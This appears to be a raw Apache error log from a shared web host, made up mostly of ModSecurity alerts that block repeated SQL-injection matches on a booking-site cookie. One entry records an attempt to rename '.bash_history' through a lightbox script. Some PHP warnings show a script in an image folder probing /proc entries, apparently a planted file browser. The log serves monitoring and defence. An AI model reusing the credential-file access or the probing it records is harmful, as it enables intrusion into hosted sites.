[Tue May 12 03:48:15.951597 2026] [security2:error] [pid 1730175:tid 1730186] [client 172.104.186.23:54460] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKG33o6NvB9WXx5V-6NFgAAAQk"]
[Tue May 12 03:48:27.678474 2026] [security2:error] [pid 1709071:tid 1709099] [client 172.104.186.23:44174] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKG67vMumyrWMfSu7q7fgAAAMw"]
[Tue May 12 03:48:27.678687 2026] [security2:error] [pid 1709071:tid 1709099] [client 172.104.186.23:44174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKG67vMumyrWMfSu7q7fgAAAMw"]
[Tue May 12 03:48:28.253805 2026] [security2:error] [pid 1709071:tid 1709099] [client 172.104.186.23:44174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKG67vMumyrWMfSu7q7fgAAAMw"]
[Tue May 12 03:48:35.948375 2026] [security2:error] [pid 1730175:tid 1730195] [client 172.104.186.23:40532] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/members"] [unique_id "agKG83o6NvB9WXx5V-6NJgAAARI"]
[Tue May 12 03:48:35.948593 2026] [security2:error] [pid 1730175:tid 1730195] [client 172.104.186.23:40532] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/members"] [unique_id "agKG83o6NvB9WXx5V-6NJgAAARI"]
[Tue May 12 03:48:35.948827 2026] [security2:error] [pid 1730175:tid 1730195] [client 172.104.186.23:40532] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKG83o6NvB9WXx5V-6NJgAAARI"]
[Tue May 12 03:48:42.098261 2026] [security2:error] [pid 1709071:tid 1709097] [client 172.104.186.23:37932] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKG-rvMumyrWMfSu7q7jAAAAMo"]
[Tue May 12 03:48:42.098616 2026] [security2:error] [pid 1709071:tid 1709097] [client 172.104.186.23:37932] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKG-rvMumyrWMfSu7q7jAAAAMo"]
[Tue May 12 03:48:42.819045 2026] [security2:error] [pid 1709071:tid 1709097] [client 172.104.186.23:37932] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKG-rvMumyrWMfSu7q7jAAAAMo"]
[Tue May 12 03:48:48.906048 2026] [security2:error] [pid 1707624:tid 1707686] [client 172.104.186.23:49050] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/shop"] [unique_id "agKHALOxS7i6i_mT2NLbVgAAAEQ"]
[Tue May 12 03:48:48.911982 2026] [security2:error] [pid 1707624:tid 1707686] [client 172.104.186.23:49050] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/shop"] [unique_id "agKHALOxS7i6i_mT2NLbVgAAAEQ"]
[Tue May 12 03:48:48.912379 2026] [security2:error] [pid 1707624:tid 1707686] [client 172.104.186.23:49050] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKHALOxS7i6i_mT2NLbVgAAAEQ"]
[Tue May 12 03:49:28.373146 2026] [security2:error] [pid 1695975:tid 1696000] [client 43.134.71.232:44786] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "of-crystal-lake.net"] [uri "/page.php"] [unique_id "agKHKNVI9ymHBxup74-d7gAAAJY"]
PHP Warning:  filesize(): stat failed for /proc/1704908/task/1704908/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704908/task/1704908/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704908/task/1704908/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704908/task/1704908/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704908/task/1704908/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704908/task/1704908/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 03:50:01.458843 2026] [security2:error] [pid 1691274:tid 1691288] [client 43.165.125.66:50292] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKHSVfdQaraX_prmqcxCAAAAAs"]
[Tue May 12 03:50:05.209220 2026] [ssl:error] [pid 1709071:tid 1709088] (EAI 2)Name or service not known: [client 74.7.244.10:41750] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 03:50:05.209291 2026] [ssl:error] [pid 1709071:tid 1709088] AH01941: stapling_renew_response: responder error
[Tue May 12 03:50:53.574624 2026] [security2:error] [pid 1709071:tid 1709105] [client 170.106.165.76:39996] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/wp-content/uploads/2023/08/muzungu_2661bfc3-0c04-448c-a8b0-06711a3367d8_943x.webp"] [unique_id "agKHfbvMumyrWMfSu7q8FAAAANI"]
[Tue May 12 03:51:17.697430 2026] [security2:error] [pid 1707624:tid 1707687] [client 216.73.216.110:46581] ModSecurity: Warning. Matched phrase ".bash_history" at ARGS:rename. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: .bash_history found within ARGS:rename: .bash_history"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/js/lightbox/index.php"] [unique_id "agKHlbOxS7i6i_mT2NLcOgAAAEU"]
[Tue May 12 03:51:17.698165 2026] [security2:error] [pid 1707624:tid 1707687] [client 216.73.216.110:46581] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/js/lightbox/index.php"] [unique_id "agKHlbOxS7i6i_mT2NLcOgAAAEU"]
[Tue May 12 03:51:17.791938 2026] [security2:error] [pid 1707624:tid 1707687] [client 216.73.216.110:46581] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agKHlbOxS7i6i_mT2NLcOgAAAEU"]
[Tue May 12 03:51:18.699921 2026] [security2:error] [pid 1695975:tid 1695980] [client 150.109.119.38:47052] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/bouclettes/"] [unique_id "agKHltVI9ymHBxup74-egwAAAII"]
[Tue May 12 03:52:38.249365 2026] [security2:error] [pid 1709071:tid 1709093] [client 172.104.186.23:40958] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKH5rvMumyrWMfSu7q8fQAAAMY"]
[Tue May 12 03:52:38.249675 2026] [security2:error] [pid 1709071:tid 1709093] [client 172.104.186.23:40958] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKH5rvMumyrWMfSu7q8fQAAAMY"]
[Tue May 12 03:52:38.885041 2026] [security2:error] [pid 1709071:tid 1709093] [client 172.104.186.23:40958] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKH5rvMumyrWMfSu7q8fQAAAMY"]
[Tue May 12 03:52:41.616255 2026] [security2:error] [pid 1691274:tid 1691291] [client 172.104.186.23:51858] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/store"] [unique_id "agKH6VfdQaraX_prmqcxtgAAAA8"]
[Tue May 12 03:52:41.616479 2026] [security2:error] [pid 1691274:tid 1691291] [client 172.104.186.23:51858] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/store"] [unique_id "agKH6VfdQaraX_prmqcxtgAAAA8"]
[Tue May 12 03:52:41.616698 2026] [security2:error] [pid 1691274:tid 1691291] [client 172.104.186.23:51858] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKH6VfdQaraX_prmqcxtgAAAA8"]
[Tue May 12 03:53:02.378813 2026] [security2:error] [pid 1730175:tid 1730183] [client 172.104.186.23:36864] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKH_no6NvB9WXx5V-6OPwAAAQY"]
[Tue May 12 03:53:02.379027 2026] [security2:error] [pid 1730175:tid 1730183] [client 172.104.186.23:36864] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKH_no6NvB9WXx5V-6OPwAAAQY"]
[Tue May 12 03:53:03.555724 2026] [security2:error] [pid 1730175:tid 1730183] [client 172.104.186.23:36864] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKH_no6NvB9WXx5V-6OPwAAAQY"]
[Tue May 12 03:53:05.863653 2026] [security2:error] [pid 1707624:tid 1707702] [client 172.104.186.23:34870] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/clients"] [unique_id "agKIAbOxS7i6i_mT2NLc6QAAAFQ"]
[Tue May 12 03:53:05.863865 2026] [security2:error] [pid 1707624:tid 1707702] [client 172.104.186.23:34870] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/clients"] [unique_id "agKIAbOxS7i6i_mT2NLc6QAAAFQ"]
[Tue May 12 03:53:05.864087 2026] [security2:error] [pid 1707624:tid 1707702] [client 172.104.186.23:34870] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKIAbOxS7i6i_mT2NLc6QAAAFQ"]
[Tue May 12 03:53:06.063423 2026] [security2:error] [pid 1730175:tid 1730183] [client 172.104.186.23:36864] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKIAno6NvB9WXx5V-6OQwAAAQY"]
[Tue May 12 03:53:06.063640 2026] [security2:error] [pid 1730175:tid 1730183] [client 172.104.186.23:36864] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKIAno6NvB9WXx5V-6OQwAAAQY"]
[Tue May 12 03:53:06.657953 2026] [security2:error] [pid 1730175:tid 1730183] [client 172.104.186.23:36864] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKIAno6NvB9WXx5V-6OQwAAAQY"]
[Tue May 12 03:53:07.970887 2026] [security2:error] [pid 1707624:tid 1707702] [client 172.104.186.23:34870] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/customer"] [unique_id "agKIA7OxS7i6i_mT2NLc7QAAAFQ"]
